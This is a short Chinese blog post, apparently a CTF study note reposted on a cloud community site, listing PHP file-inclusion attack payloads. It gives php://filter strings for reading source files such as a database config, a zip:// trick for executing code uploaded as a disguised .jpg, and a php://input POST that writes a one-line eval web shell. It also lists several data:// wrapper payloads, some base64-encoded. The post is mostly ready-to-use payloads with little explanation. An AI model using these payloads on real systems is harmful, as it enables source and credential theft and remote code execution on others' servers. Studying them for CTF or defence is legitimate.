2021-08-04 CTFer成长之路-任意文件读取漏洞-文件读取漏洞常见读取路径(PHP版)
【摘要】
第一步:
利用文件包含漏洞读取文件源码类型如下面: ?fp=php://filter/read=convert.base64-encode/resource=../sqli/db.php
第二步 写入...
第一步:
利用文件包含漏洞读取文件源码类型如下面:
?fp=php://filter/read=convert.base64-encode/resource=../sqli/db.php
第二步
写入文件
?file=zip://D:/soft/phpStudy/WWW/file.jpg%23phpcode.txt
先将要执行的PHP代码写好文件名为phpcode.txt,将phpcode.txt进行zip压缩,压缩文件名为file.zip,如果可以上传zip文件便直接上传,若不能便将file.zip重命名为file.jpg后在上传,其他几种压缩格式也可以这样操作。
由于#在get请求中会将后面的参数忽略所以使用get请求时候应进行url编码为%23,且此处经过测试相对路径是不可行,所以只能用绝对路径。
补充其他重要的协议:php://input
http://127.0.0.1/cmd.php?file=php://input
[POST DATA] <?php phpinfo()?>
也可以POST如下内容生成一句话: <?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"];?>');?>
- 1
- 2
- 3
- 4
- 5
补充其他重要的协议:data://协议
php伪协议中的data通过通配符查找目录下的所有文件
http://127.0.0.1/cmd.php?file=data://text/plain,<?php phpinfo()?>
- 1
or
http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
- 1
or
http://127.0.0.1/cmd.php?file=data:text/plain,<?php phpinfo()?>
- 1
or
http://127.0.0.1/cmd.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
- 1
文章来源: codeboy.blog.csdn.net,作者:愚公搬代码,版权归原作者所有,如需转载,请联系作者。
原文链接:codeboy.blog.csdn.net/article/details/118602761
【版权声明】本文为华为云社区用户转载文章,如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
评论(0)